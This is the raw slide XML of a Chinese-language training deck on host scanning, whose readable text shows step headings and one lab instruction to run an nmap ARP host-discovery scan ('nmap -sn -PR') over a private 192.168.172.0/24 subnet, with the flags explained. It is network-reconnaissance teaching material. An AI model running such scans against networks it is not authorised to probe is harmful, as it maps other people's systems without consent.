            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ARP的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650230" y="1176973"/>
            <a:ext cx="5080000" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.新开一个终端，使用“nmap -sn -PR 192.168.172.0/24”命令对全网段进行ARP主机发现扫描。“-sn”参数的意思是不进行端口扫描。“-PR”参数的意思是使用ARP进行扫描，如图2-2-3所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650230" y="2653348"/>
            <a:ext cx="5276850" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650230" y="5396548"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-3 对全网段进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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Text Placeholder 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071996" y="2766621"/>
            <a:ext cx="3008380" cy="662379"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="1565050"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="927951"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="982844"/>
              <a:ext cx="1120898" cy="842780"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
